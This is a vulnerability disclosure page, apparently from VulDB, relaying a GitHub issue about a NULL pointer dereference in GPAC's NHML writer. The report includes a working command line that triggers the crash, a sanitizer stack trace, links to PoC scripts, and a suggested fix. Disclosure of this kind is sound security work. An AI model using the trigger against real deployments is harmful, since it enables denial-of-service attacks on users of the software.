| Titolo | gpac v26.02.0 NULL Pointer Dereference |
|---|
| Descrizione | **Disclosure:** This report was drafted with AI assistance and manually reviewed/verified before submission.
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
## Summary
A null pointer dereference vulnerability exists in `src/filters/write_nhml.c` in the `nhmldump_send_frame()` function. The latest upstream build at commit `db3815307d1594fc34cb757d4509834a9d2e12bf` still triggers UBSan on the attached PoC/harness input.
## Vulnerability Details
**Validation Target:** Executable (`gpac` CLI)
**Location:** `src/filters/write_nhml.c:882`
**Vulnerable Code:**
```c
} else if (ctx->is_stpp && ctx->nhmlonly) {
sprintf(nhml, "<NHNTSubSample><![CDATA[\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_write_data(ctx->bs_w, data, data_size);
sprintf(nhml, "]]></NHNTSubSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
if (ctx->filep) {
// dump sample opening tag
```
The sanitizer-confirmed reproducer reaches `nhmldump_send_frame()` on the latest upstream build and reports the fault at or immediately under this location.
## Root Cause
The code assumes required state is present and dereferences a pointer that can remain NULL for malformed input or partially initialized objects.
## Steps to Reproduce
### 1. Prepare the attached PoC / harness artifacts
Use the following already-validated artifacts from the public validation repository as the attachment set for the issue:
- [run_stpp_null_packet.sh](https://github.com/Bin-infinite/vuln-validations/blob/main/gpac/latest/case-004/pocs/run_stpp_null_packet.sh)
- [poc-command.txt](https://github.com/Bin-infinite/vuln-validations/blob/main/gpac/latest/case-004/inputs/poc-command.txt)
### 2. Build or use a sanitizer-enabled latest GPAC
I reproduced this on latest upstream HEAD `db3815307d1594fc34cb757d4509834a9d2e12bf` with a Clang ASan/UBSan build under Linux. Run the following commands from this validation directory after setting `GPAC_BIN` to the sanitizer-built `gpac` executable and `GPAC_REPO` to the matching GPAC source/build tree.
### 3. Trigger the vulnerability
```bash
ASAN_OPTIONS=detect_leaks=0:abort_on_error=1:symbolize=1 UBSAN_OPTIONS=halt_on_error=1:print_stacktrace=1 \
LD_LIBRARY_PATH="$(dirname "$GPAC_BIN")" "$GPAC_BIN" \
'fin:src=null:pck=10@0:ptime=1/1000:#CodecID=stpp:#StreamType=text' \
'nhmlw:nhmlonly' -o stpp-null-packet.nhml
```
## Expected Result
GPAC should reject the malformed input or invalid state gracefully without hitting sanitizer diagnostics, leaking memory, or crashing.
## Actual Result
```
utils/bitstream.c:1184:56: runtime error: null pointer passed as argument 2, which is declared to never be null
#0 0x7533424fb733 in gf_bs_write_data /tmp/gpac-latest-wt/src/utils/bitstream.c:1184:4
#1 0x7533436f85ac in nhmldump_send_frame /tmp/gpac-latest-wt/src/filters/write_nhml.c:882:3
#2 0x7533436f85ac in nhmldump_process /tmp/gpac-latest-wt/src/filters/write_nhml.c:1028:7
#3 0x75334324f15a in gf_filter_process_task /tmp/gpac-latest-wt/src/filter_core/filter.c:3253:7
#4 0x753343222344 in gf_fs_thread_proc /tmp/gpac-latest-wt/src/filter_core/filter_session.c:2418:3
#5 0x75334321ff34 in gf_fs_run /tmp/gpac-latest-wt/src/filter_core/filter_session.c:2726:3
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior utils/bitstream.c:1184:56
```
## Impact
- **Denial of Service**: malformed input can drive a null dereference and terminate the process
- **Attack Vector**: attackers can deliver crafted media files or graph descriptions that reach the affected code path
## Suggested Fix
Check all pointer-returning helpers and intermediate objects before dereference, and propagate a parse/validation error when required state is missing.
## Environment
- GPAC version: master branch / upstream HEAD `db3815307d1594fc34cb757d4509834a9d2e12bf`
- OS: Linux
- Compiler: Clang with ASan/UBSan (LSan enabled for leak cases)
|
|---|
| Fonte | ⚠️ https://github.com/gpac/gpac/issues/3596 |
|---|
| Utente | Kery Qi (UID 94424) |
|---|
| Sottomissione | 06/06/2026 07:40 (30 giorni fa) |
|---|
| Moderazione | 05/07/2026 18:07 (29 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 376379 [GPAC 26.02.0 Media File src/filters/write_nhml.c nhmldump_send_frame negazione del servizio] |
|---|
| Punti | 20 |
|---|